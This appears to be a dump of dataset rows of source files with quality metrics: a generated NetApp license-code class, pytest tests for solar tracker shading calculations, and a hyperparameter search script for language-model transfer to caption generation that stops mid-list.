hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
094e8d98bf97626f56dde5b13f1ebbff4895210d | 156 | py | Python | generated-libraries/python/netapp/cluster/license_code_v2.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | 2 | 2017-03-28T15:31:26.000Z | 2018-08-16T22:15:18.000Z | generated-libraries/python/netapp/cluster/license_code_v2.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | null | null | null | generated-libraries/python/netapp/cluster/license_code_v2.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | null | null | null | class LicenseCodeV2(basestring):
"""
License Code V2
"""
@staticmethod
def get_api_name():
return "license-code-v2"
| 15.6 | 34 | 0.557692 | 15 | 156 | 5.666667 | 0.8 | 0.258824 | 0.305882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028846 | 0.333333 | 156 | 9 | 35 | 17.333333 | 0.788462 | 0.096154 | 0 | 0 | 0 | 0 | 0.12 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
118ac1946b1587443b9255b15c3a963f9d3638f2 | 5,244 | py | Python | twoaxistracking/tests/test_shading.py | AdamRJensen/solartrackershading | 81955e9181c58b092c2f3a21041d884f49fef262 | [
"BSD-3-Clause"
] | 5 | 2022-02-23T20:18:44.000Z | 2022-03-09T20:26:09.000Z | twoaxistracking/tests/test_shading.py | pvlib/twoaxistracking | 81955e9181c58b092c2f3a21041d884f49fef262 | [
"BSD-3-Clause"
] | 11 | 2022-02-24T11:08:14.000Z | 2022-03-11T17:15:58.000Z | twoaxistracking/tests/test_shading.py | AdamRJensen/solartrackershading | 81955e9181c58b092c2f3a21041d884f49fef262 | [
"BSD-3-Clause"
] | 2 | 2022-02-23T20:14:44.000Z | 2022-02-23T20:18:54.000Z | from twoaxistracking import shading
import numpy as np
def test_shading(rectangular_geometry, active_geometry_split, square_field_layout):
# Test shading calculation
# Also plots the geometry (ensures no errors are raised)
collector_geometry, total_collector_area, min_tracker_spacing = rectangular_geometry
X, Y, Z, tracker_distance, relative_azimuth, relative_slope = \
square_field_layout
shaded_fraction = shading.shaded_fraction(
solar_elevation=3,
solar_azimuth=120,
total_collector_geometry=collector_geometry,
active_collector_geometry=active_geometry_split,
min_tracker_spacing=min_tracker_spacing,
tracker_distance=tracker_distance,
relative_azimuth=relative_azimuth,
relative_slope=relative_slope,
slope_azimuth=0,
slope_tilt=0,
plot=True)
np.testing.assert_allclose(shaded_fraction, 0.190320666774)
def test_shading_zero_solar_elevation(rectangular_geometry, square_field_layout):
# Test shading when geometries completely overlap
collector_geometry, total_collector_area, min_tracker_spacing = rectangular_geometry
X, Y, Z, tracker_distance, relative_azimuth, relative_slope = \
square_field_layout
shaded_fraction = shading.shaded_fraction(
solar_elevation=0,
solar_azimuth=180,
total_collector_geometry=collector_geometry,
active_collector_geometry=collector_geometry,
min_tracker_spacing=min_tracker_spacing,
tracker_distance=tracker_distance,
relative_azimuth=relative_azimuth,
relative_slope=relative_slope,
slope_azimuth=0,
slope_tilt=0,
plot=False)
assert shaded_fraction == 1
def test_no_shading(rectangular_geometry, square_field_layout):
# Test shading calculation when there is no shading (high solar elevation)
collector_geometry, total_collector_area, min_tracker_spacing = rectangular_geometry
X, Y, Z, tracker_distance, relative_azimuth, relative_slope = \
square_field_layout
shaded_fraction = shading.shaded_fraction(
solar_elevation=45,
solar_azimuth=180,
total_collector_geometry=collector_geometry,
active_collector_geometry=collector_geometry,
min_tracker_spacing=min_tracker_spacing,
tracker_distance=tracker_distance,
relative_azimuth=relative_azimuth,
relative_slope=relative_slope,
slope_azimuth=0,
slope_tilt=0,
plot=False)
assert shaded_fraction == 0
def test_shading_below_horizon(rectangular_geometry, square_field_layout):
# Test shading calculation when sun is below the horizon (elevation<0)
collector_geometry, total_collector_area, min_tracker_spacing = rectangular_geometry
X, Y, Z, tracker_distance, relative_azimuth, relative_slope = \
square_field_layout
shaded_fraction = shading.shaded_fraction(
solar_elevation=-5.1,
solar_azimuth=180,
total_collector_geometry=collector_geometry,
active_collector_geometry=collector_geometry,
min_tracker_spacing=min_tracker_spacing,
tracker_distance=tracker_distance,
relative_azimuth=relative_azimuth,
relative_slope=relative_slope,
slope_azimuth=0,
slope_tilt=0,
plot=False)
assert np.isnan(shaded_fraction)
def test_shading_below_hill_horizon(rectangular_geometry, square_field_layout):
# Test shading when sun is below horizon line caused by sloped surface
collector_geometry, total_collector_area, min_tracker_spacing = rectangular_geometry
X, Y, Z, tracker_distance, relative_azimuth, relative_slope = \
square_field_layout
shaded_fraction = shading.shaded_fraction(
solar_elevation=9,
solar_azimuth=180,
total_collector_geometry=collector_geometry,
active_collector_geometry=collector_geometry,
min_tracker_spacing=min_tracker_spacing,
tracker_distance=tracker_distance,
relative_azimuth=relative_azimuth,
relative_slope=relative_slope,
slope_azimuth=0,
slope_tilt=10,
plot=False)
assert shaded_fraction == 1
def test_shading_max_shading_elevation(rectangular_geometry, square_field_layout):
# Test that shaded_fraction is set to one when the solar elevation angle
# is greater than the max_shading_elevation (even though shading may occur)
collector_geometry, total_collector_area, min_tracker_spacing = rectangular_geometry
X, Y, Z, tracker_distance, relative_azimuth, relative_slope = \
square_field_layout
shaded_fraction = shading.shaded_fraction(
solar_elevation=3, # low solar elevation angle with guaranteed shading
solar_azimuth=180,
total_collector_geometry=collector_geometry,
active_collector_geometry=collector_geometry,
min_tracker_spacing=min_tracker_spacing,
tracker_distance=tracker_distance,
relative_azimuth=relative_azimuth,
relative_slope=relative_slope,
slope_azimuth=0,
slope_tilt=10,
max_shading_elevation=2, # lower than true max angle for testing purposes
plot=False)
assert shaded_fraction == 0
| 41.619048 | 88 | 0.749237 | 612 | 5,244 | 6.013072 | 0.156863 | 0.133967 | 0.083152 | 0.097826 | 0.810326 | 0.810326 | 0.791304 | 0.775543 | 0.714946 | 0.68125 | 0 | 0.014034 | 0.198322 | 5,244 | 125 | 89 | 41.952 | 0.861323 | 0.110603 | 0 | 0.828571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057143 | 1 | 0.057143 | false | 0 | 0.019048 | 0 | 0.07619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
11abe604f0160b86b71880ab20db1655dac6ef87 | 32,900 | py | Python | experiments/thesis/langmodtrans_hyperpar.py | mtanti/mtanti-phd | d915b6f96f1bae1a7f517eb1dbd9d4a88ca56576 | [
"MIT"
] | 6 | 2019-05-20T06:48:37.000Z | 2021-01-03T05:43:47.000Z | experiments/thesis/langmodtrans_hyperpar.py | mtanti/mtanti-phd | d915b6f96f1bae1a7f517eb1dbd9d4a88ca56576 | [
"MIT"
] | 1 | 2019-01-17T03:17:10.000Z | 2019-02-23T17:31:41.000Z | experiments/thesis/langmodtrans_hyperpar.py | mtanti/mtanti-phd | d915b6f96f1bae1a7f517eb1dbd9d4a88ca56576 | [
"MIT"
] | null | null | null | import skopt
import os
import numpy as np
import shutil
import sys
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
from framework import lib
from framework import model_neural_trad
from framework import evaluation
from framework import data
from framework import config
########################################################################################
class InfinitePerplexityError(ArithmeticError):
def __init__(self):
super(InfinitePerplexityError, self).__init__()
########################################################################################
def standardize_hyperpar(hp):
new_hp = [
(
round(x.tolist(), 20) if type(x) is np.float64 else
x.tolist() if type(x) is np.int64 else
x
) for x in hp
]
return new_hp
########################################################################################
def prepare_hyperpar_for_tell(hp):
return hp
########################################################################################
if len(sys.argv) == 1:
corpora = 'lm1b,mscoco,flickr8k'.split(',')
else:
corpora = sys.argv[1].split(',')
datasources = data.load_datasources(config.langmodtrans_capgen_dataset)
capgen_size = datasources['train'].size
capgen_test = data.load_datasources('mscoco')['test'].shuffle(0).take(datasources['test'].num_groups, whole_groups=True) #MSCOCO test is never used in langmodtrans experiments so we can validate on it
del datasources
lib.create_dir(config.hyperpar_dir+'/langmodtrans')
for corpus in corpora:
lib.create_dir(config.hyperpar_dir+'/langmodtrans/'+corpus)
print('='*100)
print(lib.formatted_clock())
print(corpus, '1 (language model)')
print()
if lib.file_exists(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_best.txt'):
print('Found ready')
print()
continue
print(
'#',
'init_method',
'max_init_weight',
'embed_size',
'rnn_size',
'post_image_size',
'pre_output_size',
'post_image_activation',
'rnn_type',
'optimizer',
'learning_rate',
'normalize_image',
'weights_reg_weight',
'image_dropout_prob',
'post_image_dropout_prob',
'embedding_dropout_prob',
'rnn_dropout_prob',
'max_gradient_norm',
'minibatch_size',
'beam_width',
'geomeanpplx',
'duration',
sep='\t'
)
datasources = data.load_datasources(corpus)
datasources['train'] = datasources['train'].shuffle(0).take(capgen_size)
vocab = datasources['train'].tokenize_sents().text_sents.get_vocab(config.min_token_freq)
dataset = data.Dataset(
vocab = vocab,
train_datasource = datasources['train'],
val_datasource = datasources['val'],
test_datasource = capgen_test,
)
dataset.compile_sents()
test_index_sents = dataset.test.index_sents
if not lib.file_exists(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_search.txt'):
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_search.txt', 'w', encoding='utf-8') as f:
print(
'#',
'init_method',
'max_init_weight',
'embed_size',
'rnn_size',
'post_image_size',
'pre_output_size',
'post_image_activation',
'rnn_type',
'optimizer',
'learning_rate',
'normalize_image',
'weights_reg_weight',
'image_dropout_prob',
'post_image_dropout_prob',
'embedding_dropout_prob',
'rnn_dropout_prob',
'max_gradient_norm',
'minibatch_size',
'beam_width',
'geomeanpplx',
'duration',
sep='\t', file=f
)
if not lib.file_exists(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_search_errors.txt'):
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_search_errors.txt', 'w', encoding='utf-8') as f:
print(
'#',
'init_method',
'max_init_weight',
'embed_size',
'rnn_size',
'post_image_size',
'pre_output_size',
'post_image_activation',
'rnn_type',
'optimizer',
'learning_rate',
'normalize_image',
'weights_reg_weight',
'image_dropout_prob',
'post_image_dropout_prob',
'embedding_dropout_prob',
'rnn_dropout_prob',
'max_gradient_norm',
'minibatch_size',
'beam_width',
'error',
'duration',
sep='\t', file=f
)
def objective(hyperpar):
[
init_method,
max_init_weight,
embed_size,
rnn_size,
post_image_size,
pre_output_size,
post_image_activation,
rnn_type,
optimizer,
learning_rate,
normalize_image,
weights_reg_weight,
image_dropout_prob,
post_image_dropout_prob,
embedding_dropout_prob,
rnn_dropout_prob,
max_gradient_norm,
minibatch_size,
beam_width,
] = hyperpar
with model_neural_trad.TradNeuralModel(
vocab_size = vocab.size,
init_method = init_method,
max_init_weight = max_init_weight,
embed_size = embed_size,
rnn_size = rnn_size,
post_image_size = post_image_size,
pre_output_size = pre_output_size,
post_image_activation = post_image_activation,
rnn_type = rnn_type,
architecture = 'langmod',
optimizer = optimizer,
learning_rate = learning_rate,
normalize_image = normalize_image,
weights_reg_weight = weights_reg_weight,
image_dropout_prob = image_dropout_prob,
post_image_dropout_prob = post_image_dropout_prob,
embedding_dropout_prob = embedding_dropout_prob,
rnn_dropout_prob = rnn_dropout_prob,
max_gradient_norm = max_gradient_norm,
freeze_prefix_params = False,
) as model:
model.compile_model()
result = list()
for _ in range(config.hyperpar_num_runs):
model.init_params()
model.fit(dataset, config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_model.hdf5', max_batch_size=config.val_batch_size, minibatch_size=minibatch_size, max_epochs=config.hyperpar_max_epochs, early_stop_patience=config.early_stop_patience)
(logpplx, num_inf_pplx) = evaluation.get_loggeomean_perplexity(model.get_sents_logprobs(max_batch_size=config.val_batch_size, index_sents=test_index_sents)[0], test_index_sents.lens)
if num_inf_pplx > 0:
raise InfinitePerplexityError()
result.append(logpplx)
return np.mean(result)
opt = skopt.Optimizer(
[
skopt.space.Categorical(config.hyperpar_space['init_method'], name='init_method'),
skopt.space.Real(*config.hyperpar_space['max_init_weight'], 'log-uniform', name='max_init_weight'),
skopt.space.Integer(*config.hyperpar_space['embed_size'], name='embed_size'),
skopt.space.Integer(*config.hyperpar_space['rnn_size'], name='rnn_size'),
skopt.space.Categorical([None], name='post_image_size'),
skopt.space.Categorical([None], name='pre_output_size'),
skopt.space.Categorical(['none'], name='post_image_activation'),
skopt.space.Categorical(config.hyperpar_space['rnn_type'], name='rnn_type'),
skopt.space.Categorical(config.hyperpar_space['optimizer'], name='optimizer'),
skopt.space.Real(*config.hyperpar_space['learning_rate'], 'log-uniform', name='learning_rate'),
skopt.space.Categorical([False], name='normalize_image'),
skopt.space.Real(*config.hyperpar_space['weights_reg_weight'], 'log-uniform', name='weights_reg_weight'),
skopt.space.Categorical([0.0], name='image_dropout_prob'),
skopt.space.Categorical([0.0], name='post_image_dropout_prob'),
skopt.space.Real(*config.hyperpar_space['embedding_dropout_prob'], 'uniform', name='embedding_dropout_prob'),
skopt.space.Real(*config.hyperpar_space['rnn_dropout_prob'], 'uniform', name='rnn_dropout_prob'),
skopt.space.Real(*config.hyperpar_space['max_gradient_norm'], 'log-uniform', name='max_gradient_norm'),
skopt.space.Integer(*config.hyperpar_space['minibatch_size'], name='minibatch_size'),
skopt.space.Categorical([1], name='beam_width'),
],
n_initial_points=config.hyperpar_num_random_evals,
base_estimator='RF',
acq_func='EI',
acq_optimizer='auto',
random_state=0,
)
i = 0
already_seen = set()
best_hyperpar = None
best_cost = None
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_search.txt', 'r', encoding='utf-8') as f:
for line in f.read().strip().split('\n')[1:]:
i += 1
[
entry_num,
init_method,
max_init_weight,
embed_size,
rnn_size,
post_image_size,
pre_output_size,
post_image_activation,
rnn_type,
optimizer,
learning_rate,
normalize_image,
weights_reg_weight,
image_dropout_prob,
post_image_dropout_prob,
embedding_dropout_prob,
rnn_dropout_prob,
max_gradient_norm,
minibatch_size,
beam_width,
cost,
duration,
] = line.split('\t')
next_hyperpar = [
init_method,
float(max_init_weight),
int(embed_size),
int(rnn_size),
int(post_image_size) if post_image_size != 'None' else None,
int(pre_output_size) if pre_output_size != 'None' else None,
post_image_activation,
rnn_type,
optimizer,
float(learning_rate),
normalize_image == 'True',
float(weights_reg_weight),
float(image_dropout_prob),
float(post_image_dropout_prob),
float(embedding_dropout_prob),
float(rnn_dropout_prob),
float(max_gradient_norm),
int(minibatch_size),
int(beam_width),
]
cost = float(cost)
duration = int(duration)
if i < config.hyperpar_num_random_evals + config.hyperpar_num_evals:
num_hyperpars = 1
while standardize_hyperpar(opt.ask(num_hyperpars)[-1]) != next_hyperpar:
print(i, '<<FOUND HYPERPARAMS THAT RESULTED IN ERRORS LAST TIME>>')
num_hyperpars += 1
opt.tell(prepare_hyperpar_for_tell(next_hyperpar), cost)
if best_cost is None or cost < best_cost:
best_hyperpar = next_hyperpar
best_cost = cost
already_seen.add(tuple(next_hyperpar))
print(i, *next_hyperpar, cost, lib.format_duration(duration), '******' if cost == best_cost else '', sep='\t')
for _ in range(i, config.hyperpar_num_random_evals + config.hyperpar_num_evals):
i += 1
num_hyperpars = 1
while True:
t = lib.Timer()
next_hyperpar = standardize_hyperpar(opt.ask(num_hyperpars)[-1]) #This allows us to get different hyperparameters every time the previous hyperparameters resulted in <<SEEN>>, <<NAN>>, or <<EMPTY>>
num_hyperpars += 1
print(i, *next_hyperpar, sep='\t', end='\t')
if tuple(next_hyperpar) in already_seen:
duration = t.get_duration()
print('<<SEEN>>', lib.format_duration(duration), sep='\t')
continue
try:
cost = objective(next_hyperpar)
except model_neural_trad.NotANumberError:
duration = t.get_duration()
print('<<NAN>>', lib.format_duration(duration), sep='\t')
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_search_errors.txt', 'a', encoding='utf-8') as f:
print(i, *next_hyperpar, 'nan', duration, sep='\t', file=f)
continue
except model_neural_trad.EmptyBeamError:
duration = t.get_duration()
print('<<EMPTY>>', lib.format_duration(duration), sep='\t')
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_search_errors.txt', 'a', encoding='utf-8') as f:
print(i, *next_hyperpar, 'empty', duration, sep='\t', file=f)
continue
except InfinitePerplexityError:
duration = t.get_duration()
print('<<INFPPLX>>', lib.format_duration(duration), sep='\t')
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_search_errors.txt', 'a', encoding='utf-8') as f:
print(i, *next_hyperpar, 'infpplx', duration, sep='\t', file=f)
continue
break
duration = t.get_duration()
opt.tell(prepare_hyperpar_for_tell(next_hyperpar), cost)
if best_cost is None or cost < best_cost:
best_hyperpar = next_hyperpar
best_cost = cost
shutil.copyfile(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_model.hdf5', config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_model_best.hdf5')
already_seen.add(tuple(next_hyperpar))
print(cost, lib.format_duration(duration), '******' if cost == best_cost else '', sep='\t')
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_search.txt', 'a', encoding='utf-8') as f:
print(i, *next_hyperpar, cost, duration, sep='\t', file=f)
print('-'*100)
print(lib.formatted_clock())
print('best found:')
print('', *best_hyperpar, best_cost, sep='\t')
print()
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_best.txt', 'w', encoding='utf-8') as f:
print('loggeomeanpplx', best_cost, sep='\t', file=f)
print('init_method', best_hyperpar[0], sep='\t', file=f)
print('max_init_weight', best_hyperpar[1], sep='\t', file=f)
print('embed_size', best_hyperpar[2], sep='\t', file=f)
print('rnn_size', best_hyperpar[3], sep='\t', file=f)
print('post_image_size', best_hyperpar[4], sep='\t', file=f)
print('pre_output_size', best_hyperpar[5], sep='\t', file=f)
print('post_image_activation', best_hyperpar[6], sep='\t', file=f)
print('rnn_type', best_hyperpar[7], sep='\t', file=f)
print('optimizer', best_hyperpar[8], sep='\t', file=f)
print('learning_rate', best_hyperpar[9], sep='\t', file=f)
print('normalize_image', best_hyperpar[10], sep='\t', file=f)
print('weights_reg_weight', best_hyperpar[11], sep='\t', file=f)
print('image_dropout_prob', best_hyperpar[12], sep='\t', file=f)
print('post_image_dropout_prob', best_hyperpar[13], sep='\t', file=f)
print('embedding_dropout_prob', best_hyperpar[14], sep='\t', file=f)
print('rnn_dropout_prob', best_hyperpar[15], sep='\t', file=f)
print('max_gradient_norm', best_hyperpar[16], sep='\t', file=f)
print('minibatch_size', best_hyperpar[17], sep='\t', file=f)
print('beam_width', best_hyperpar[18], sep='\t', file=f)
best_prefix_params = model_neural_trad.TradNeuralModel.get_saved_prefix_params(vocab, config.hyperpar_dir+'/langmodtrans/'+corpus+'/1_model_best.hdf5')
langmod_embed_size = best_hyperpar[2]
langmod_rnn_size = best_hyperpar[3]
langmod_rnn_type = best_hyperpar[7]
langmod_embedding_dropout_prob = best_hyperpar[14]
########################################################################################
print('-'*100)
print(lib.formatted_clock())
print(corpus, '2 (caption generator)')
print()
print(
'#',
'init_method',
'max_init_weight',
'embed_size',
'rnn_size',
'post_image_size',
'pre_output_size',
'rnn_type',
'post_image_activation',
'optimizer',
'learning_rate',
'normalize_image',
'weights_reg_weight',
'image_dropout_prob',
'post_image_dropout_prob',
'embedding_dropout_prob',
'rnn_dropout_prob',
'max_gradient_norm',
'minibatch_size',
'beam_width',
'WMD',
'duration',
sep='\t'
)
datasources = data.load_datasources(config.langmodtrans_capgen_dataset)
vocab = datasources['train'].tokenize_sents().text_sents.get_vocab(config.min_token_freq).intersection(best_prefix_params.vocab)
dataset = data.Dataset(
vocab = vocab,
train_datasource = datasources['train'],
val_datasource = datasources['val'],
test_datasource = data.load_datasources('mscoco')['val'].shuffle(0).take(datasources['test'].num_groups, whole_groups=True),
)
dataset.compile_sents()
test_images = dataset.test.get_images()
test_sents = dataset.test.get_text_sent_groups()
best_prefix_params = best_prefix_params.convert_to_new_vocabulary(vocab)
if not lib.file_exists(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_search.txt'):
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_search.txt', 'w', encoding='utf-8') as f:
print(
'#',
'init_method',
'max_init_weight',
'embed_size',
'rnn_size',
'post_image_size',
'pre_output_size',
'post_image_activation',
'rnn_type',
'optimizer',
'learning_rate',
'normalize_image',
'weights_reg_weight',
'image_dropout_prob',
'post_image_dropout_prob',
'embedding_dropout_prob',
'rnn_dropout_prob',
'max_gradient_norm',
'minibatch_size',
'beam_width',
'WMD',
'duration',
sep='\t', file=f
)
if not lib.file_exists(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_search_errors.txt'):
with open(config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_search_errors.txt', 'w', encoding='utf-8') as f:
print(
'#',
'init_method',
'max_init_weight',
'embed_size',
'rnn_size',
'post_image_size',
'pre_output_size',
'post_image_activation',
'rnn_type',
'optimizer',
'learning_rate',
'normalize_image',
'weights_reg_weight',
'image_dropout_prob',
'post_image_dropout_prob',
'embedding_dropout_prob',
'rnn_dropout_prob',
'max_gradient_norm',
'minibatch_size',
'beam_width',
'error',
'duration',
sep='\t', file=f
)
def objective(hyperpar):
[
init_method,
max_init_weight,
embed_size,
rnn_size,
post_image_size,
pre_output_size,
post_image_activation,
rnn_type,
optimizer,
learning_rate,
normalize_image,
weights_reg_weight,
image_dropout_prob,
post_image_dropout_prob,
embedding_dropout_prob,
rnn_dropout_prob,
max_gradient_norm,
minibatch_size,
beam_width,
] = hyperpar
with model_neural_trad.TradNeuralModel(
vocab_size = vocab.size,
init_method = init_method,
max_init_weight = max_init_weight,
embed_size = embed_size,
rnn_size = rnn_size,
post_image_size = post_image_size,
pre_output_size = pre_output_size,
post_image_activation = post_image_activation,
rnn_type = rnn_type,
architecture = 'merge',
optimizer = optimizer,
learning_rate = learning_rate,
normalize_image = normalize_image,
weights_reg_weight = weights_reg_weight,
image_dropout_prob = image_dropout_prob,
post_image_dropout_prob = post_image_dropout_prob,
embedding_dropout_prob = embedding_dropout_prob,
rnn_dropout_prob = rnn_dropout_prob,
max_gradient_norm = max_gradient_norm,
freeze_prefix_params = True,
) as model:
model.compile_model()
result = list()
for _ in range(config.hyperpar_num_runs):
model.init_params()
model.set_prefix_params(best_prefix_params)
model.fit(dataset, config.hyperpar_dir+'/langmodtrans/'+corpus+'/2_model.hdf5', max_batch_size=config.val_batch_size, minibatch_size=minibatch_size, max_epochs=config.hyperpar_max_epochs, early_stop_patience=config.early_stop_patience)
(index_sents, logprobs) = model.generate_sents_beamsearch(max_batch_size=config.val_batch_size, images=test_images, beam_width=beam_width, lower_bound_len=config.lower_bound_len, upper_bound_len=config.upper_bound_len, temperature=config.temperature)
text_sents = index_sents.decompile_sents(vocab).sents
wmd = evaluation.get_wmd_score(test_sents, text_sents)[0]
result.append(wmd)
return -np.mean(result)
opt = skopt.Optimizer(
[
skopt.space.Categorical(config.hyperpar_space['init_method'], name='init_method'),
skopt.space.Real(*config.hyperpar_space['max_init_weight'], 'log-uniform', name='max_init_weight'),
skopt.space.Categorical([langmod_embed_size], name='embed_size'),
skopt.space.Categorical([langmod_rnn_size], name='rnn_size'),
skopt.space.Integer(*config.hyperpar_space['post_image_size'], name='post_image_size'),
skopt.space.Categorical([None], name='pre_output_size'),
skopt.space.Categorical(config.hyperpar_space['post_image_activation'], name='post_image_activation'),
skopt.space.Categorical([langmod_rnn_type], name='rnn_type'),
skopt.space.Categorical(config.hyperpar_space['optimizer'], name='optimizer'),
skopt.space.Real(*config.hyperpar_space['learning_rate'], 'log-uniform', name='learning_rate'),
skopt.space.Categorical(config.hyperpar_space['normalize_image'], name='normalize_image'),
skopt.space.Real(*config.hyperpar_space['weights_reg_weight'], 'log-uniform', name='weights_reg_weight'),
skopt.space.Real(*config.hyperpar_space['image_dropout_prob'], 'uniform', name='image_dropout_prob'),
skopt.space.Real(*config.hyperpar_space['post_image_dropout_prob'], 'uniform', name='post_image_dropout_prob'),
skopt.space.Categorical([langmod_embedding_dropout_prob], name='embedding_dropout_prob'),
skopt.space.Real(*config.hyperpar_space['rnn_dropout_prob'], 'uniform', name='rnn_dropout_prob'),
skopt.space.Real(*config.hyperpar_space['max_gradient_norm'], 'log-uniform', name='max_gradient_norm'),
